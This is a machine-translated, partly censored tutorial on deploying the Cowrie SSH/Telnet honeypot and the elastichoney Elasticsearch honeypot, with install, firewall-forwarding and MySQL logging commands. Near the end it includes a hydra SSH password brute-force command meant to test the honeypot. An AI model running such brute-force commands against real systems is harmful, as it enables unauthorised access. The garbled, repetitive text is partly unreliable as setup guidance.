honey jar
What is a honeypot
is a party to *** cheat on honeypot technology essence, by arranging some hosts, network services or information as a bait to lure *** *** square of their implementation, which can *** behavior of the capture and analysis to understand the tools and methods used by the party ***, *** presumed intent and motive, the defender can make a clear understanding of the security threats they are facing, and through technical and management means to enhance the security capabilities of the actual system.
Honeypot is like intelligence collection system. Honeypot like people deliberately *** goals come *** *** lure. *** *** so after those, you can know how he succeed, keep abreast of the latest vulnerabilities for server *** and launched. Also by tapping the link between ***, *** collecting all sorts of tools used, and master their social network.
On the honeypot technology is essentially a party to *** cheat technology, as a decoy by placing some of the hosts.
cowrie passive way
What is cowrie
Cowrie is a moderate SSH and Telnet interaction honeypot, it can get for *** by brute force dictionary, command input and malicious file upload or download.
characteristic:
- Camouflage file system can be increased / remove files; there is a complete file system with Debian 5.0;
- Increase the content of the document, who can view *** The / etc / passwd file and other cat command; feed system contains a minimum content files;
- Session Logging UML format compatible, easy to repeat;
- Cowrie save file Download wget / curl, or a follow-up examination - Post using SFTP and SCP;
Installation and operation cowrie
useradd cowrie
passwd cowrie
yum install -y git python-virtualenv bzip2-devel libffi-devel vim net-tools mysql-devel
yum groupinstall "Development Tools"
git clone https://github.com/cowrie/cowrie.git
Create a virtual environment
Copy the code
virtualenv -p python2.7 cowrie-env
source cowrie-env/bin/activate
#Python virtual execution environment
PIP install Six Packaging appdirs
PIP install -r requirements.txt
cp cowrie.cfg.dist cowrie.cfg
chown -R cowrie /opt/cowrie/
Copy the code
Port environment configuration
copy the code
vim / etc / SSH / sshd_config
...
#port 22 to Port 321
vim cowrie.cfg # file modification
...
listen_port = 2222
Copy the code
Configure the firewall
firewall-cmd --permanent --add-port=321/tcp
firewall-cmd --zone=public --add-masquerade --permanent
firewall-cmd --zone=public --add-forward-port=port=22:proto=tcp:toport=2222 --permanent
firewall-cmd --permanent --list-all
firewall-cmd --reload
systemctl restart sshd
Configuring Mysql database
wget https://dev.mysql.com/get/mysql57-community-release-el7-11.noarch.rpm
yum localinstall mysql57-community-release-el7-11.noarch.rpm
yum install mysql-community-server
systemctl start mysqld
systemctl enable mysqld
systemctl daemon-reload
Python mysql package
. cowrie-env/bin/activate
pip install mysql-python
Import /opt/cowrie/docs/sql/mysql.sql
Modify the configuration file
Copy the code
[output_mysql]
enabled = true
host = localhost
database = cowrie
username = cowrie
password = 123456
port = 3306
Copy the code
Kali test ***
hydra -l root -P ./password.txt -f ssh://IP
Honeypot elastichoney
Configuring go environment
Environment variables:
Copy the code
vim ~/.bashrc
...
export GOROOT=/usr/local/go
export GOPATH=/opt/goblog
export PATH=$PATH:$GOPATH:/usr/local/go/bin
source /etc/profile
Copy the code
Download environment
go get github.com/fw42/go-hpfeeds
git clone https://github.com/jordan-wright/elastichoney.git
You need to modify the configuration before compiling:
run
go get github.com/fw42/go-hpfeeds
git clone https://github.com/jordan-wright/elastichoney.git
You need to modify the configuration before compiling:
Download environment
go build -o elastichoney
./elastichoney -config="config.json" -log="logs/elastichoney.log" -verbose=true